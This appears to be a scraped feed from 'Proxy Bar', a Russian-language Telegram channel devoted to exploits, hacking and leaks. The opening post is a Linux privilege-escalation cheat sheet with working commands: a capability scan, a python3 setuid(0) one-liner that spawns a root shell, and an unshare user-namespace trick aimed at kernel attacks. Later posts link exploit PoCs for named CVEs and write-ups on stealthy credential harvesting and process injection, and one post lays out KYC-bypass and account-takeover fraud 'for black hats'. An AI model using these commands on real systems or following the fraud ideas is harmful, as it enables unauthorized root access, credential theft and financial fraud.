Proxy Bar
20.3K subscribers
1.5K photos
95 videos
669 files
1.53K links
Exploits, Hacking and Leaks

Чат группы - https://t.iss.one/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
Рубрика На заметку $[email protected] - part 8
*

*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились Capabilities !
Отдельные привилегии , дающие значок шерифа (например меняя UID).

Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID

Кстати иногда админы отдают capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.
*
*

Namespaces Abuse
Вообще namespaces изолируют ресурсы: PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace

#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)

А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих kernel privilege escalation присутствует.
То есть можно:
mkdir lower upper work merged

И смонтировать overlay = OverlayFS/FUSE/kernel permission bypass

Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m

#РубрикаНаЗаметкуХакеру
🔥13👍11
Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP
🔥16😱9
unable to locate 😭
Вообще считаю что Отечественные ОС должны выдавать sudo через MAX
👍39😱21🔥13
Bypassing Detections with Command-Line Obfuscation
*
Read
🔥18👍10😱4
🔥13😱5👍3
What Windows Server 2025 Quietly Did to Your NTLM Relay

Game over.
👍11🔥7
Nginx-UI Vulnerable to Unauthenticated Backup Download with Encryption Key Disclosure
*
POC
😱13👍8🔥1
CVE-2025-69219 — Apache Airflow Providers HTTP RCE
*
PoC
🔥12👍5
CVE-2026-28292: RCE in simple-git

Full Proof of Concept
👍12
УУУУ жир
Mastercard запускает новую блокчейн-инициативу для мгновенных международных переводов, к которой подключились Binance, PayPal и Ripple и тд.
Идея простая: объединить ликвидность криптобирж, огромную аудиторию PayPal и технологию трансграничных расчётов Ripple, чтобы отправлять бабки почти мгновенно ииии за свой <1% (ну разумеется).
*
А чьто для черных шляп ?
Появление более жирной и дорогой поверхности атаки !
Ведь в крипто партнерке 85 + компаний и у каждой свои рельсы, API, SDK, провайдеры ликвидности, compliance-подрядчиков и интеграционных сценариев, бизнес логики ичтотамеще. Supply-chain во все поля.
А чем больше интеграций, тем больше ошибок в логике, правах доступа, webhook/API-цепочках и обработке исключений.
Технические взломы отваливают на второй план - а гибридный fraud-abuse впереди.
Все потому что у Mastercard Crypto Credential упор на верифицированные идентификаторы\проверку поддерживаемых активов, governance framework и вот это вот все.
Поэтому и становятся ценными - обход KYC/KYB, захват аккаунтов, подмена бенефициара, соц engineering вокруг “алиасов”, abuse возвратов/чарджбеков и попытки проскочить без мыла между булок разных юрисдикций.
А еще будет санкционный/географический арбитраж !

Белые шапки конечно тоже заработают, только меньше.

И сам блокчейн тут не главная история.Кулл стори тут это конвертация криптоИнфры в массовый платёжный контур.
👍36😱9
ibWebAdmin Unauthenticated RCE
*
writeUP
*
PoC
👍12🔥3
Hello, here!
👍9🔥6😱5
RIP RegPwn: The Rise and Fall of a Windows Registry Exploitation Technique

Original text by Filip Dragovic.

As part of MDSec’s R&D work, we often discover vulnerabilities and develop exploits to support our red team engagements. When researching widely used software, it is often only a matter of time before the same vulnerability is discovered by other researchers and reported to the vendor. Two weeks ago we…

https://core-jmp.org/2026/03/rip-regpwn-the-rise-and-fall-of-a-windows-registry-exploitation-technique/
👍12🔥6
CrackArmor: Critical AppArmor Flaws Enable Local Privilege Escalation to Root
*
crack-armor.txt
🔥18👍6
Silent Harvest: Extracting Windows Secrets Under the Radar

Original text by Sud0Ru

What the article is about

The article explains how attackers can quietly harvest sensitive Windows credentials and secrets after gaining initial access to a system, while avoiding detection by modern EDR solutions. The goal is to collect credentials for lateral movement without triggering typical security alerts.

The author first describes how…

https://core-jmp.org/2026/03/silent-harvest-extracting-windows-secrets-under-the-radar/
🔥12👍6
Reverse engineering undocumented Windows Kernel features to work with the EDR

Original text by 0xflux/

[Reverse engineering Windows internals: because sometimes the best way to fix a problem is to take the operating system apart.]

Intro

The information contained in this blog post is valid for the Windows 11 Kernel 24H2, and is not guaranteed to be accurate on other kernel versions.

The code for this…

https://core-jmp.org/2026/03/reverse-engineering-undocumented-windows-kernel-features-to-work-with-the-edr/
🔥10👍7
Active Directory Security Assessment: Password Spraying, Privilege Escalation, and Kerberoasting

Active Directory remains the backbone of identity and access management in most enterprise environments. Because of its central role in authentication, authorization, and service delegation, compromising Active Directory often means compromising the entire organization. Modern attackers understand this well and frequently target domain infrastructure as the primary objective during intrusion campaigns.

Unlike traditional exploitation techniques…

https://core-jmp.org/2026/03/active-directory-security-assessment-password-spraying-privilege-escalation-and-kerberoasting/
🔥7👍6
How Kernel Anti-Cheats Work: A Deep Dive into Modern Game Protection

Original text by s4dbrd

The article explains how modern kernel-level anti-cheat systems operate and why game developers increasingly rely on kernel drivers to combat advanced cheating techniques. It describes how anti-cheat software loads privileged drivers that run at the same level as the Windows kernel, allowing them to monitor processes, detect unauthorized memory manipulation, and…

https://core-jmp.org/2026/03/how-kernel-anti-cheats-work-a-deep-dive-into-modern-game-protection/
👍15🔥10
Crimes against NTDLL – Implementing Early Cascade Injection

Original text by fluxsec

Early Cascade Injection is an advanced process injection technique designed to execute payloads at the earliest stage of Windows process initialization. The method abuses internal components of the Windows loader located in ntdll.dll, specifically the Application Compatibility Shim Engine. By modifying undocumented global variables such as g_ShimsEnabled and the callback pointer…

https://core-jmp.org/2026/03/crimes-against-ntdll-implementing-early-cascade-injection/
🔥7👍5